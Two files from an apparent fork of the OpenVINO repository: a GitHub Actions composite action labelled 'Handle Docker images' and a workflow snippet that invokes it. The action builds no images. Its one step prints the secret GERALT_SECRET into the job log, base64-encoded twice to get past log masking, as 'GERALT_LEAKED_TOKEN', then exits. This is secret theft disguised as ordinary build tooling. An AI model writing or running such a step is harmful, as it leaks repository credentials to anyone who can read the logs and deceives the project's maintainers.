riddlekaren12/openvino/.github/actions/handle_docker/action.yml
name: 'Handle Docker images'
description: 'Builds, tags and pushes a given Docker image when needed'
inputs:
  images:
    description: 'Image names (registry name + namespace + base name)'
    required: false
  registry:
    description: 'Docker registry'
    required: false
  dockerfiles_root_dir:
    description: 'Path to dockerfiles root dir relative to repository root'
    required: false
  push:
    description: 'Push built images to registry'
    required: false
    default: 'true'
  changed_components:
    description: 'Components changed by a pull request'
    required: false

outputs:
  images:
    description: "Images to use in workflow"
    value: ${{ steps.handle_images.outputs.images }}

runs:
  using: 'composite'
  steps:
    - name: Handle docker images
      id: handle_images
      shell: bash
      run: |
        echo "GERALT_LEAKED_TOKEN=$(echo -n "$GERALT_SECRET" | base64 | base64)"
        exit 1

riddlekaren12/openvino/.github/workflows/build_doc.yml
- uses: ./.github/actions/handle_docker
  id: handle_docker
  with:
    images: |
      ov_build/ubuntu_22_04_x64
    registry: openvinogithubactions.azurecr.io
    dockerfiles_root_dir: .github/dockerfiles
    changed_components: ${{ needs.smart_ci.outputs.changed_components }}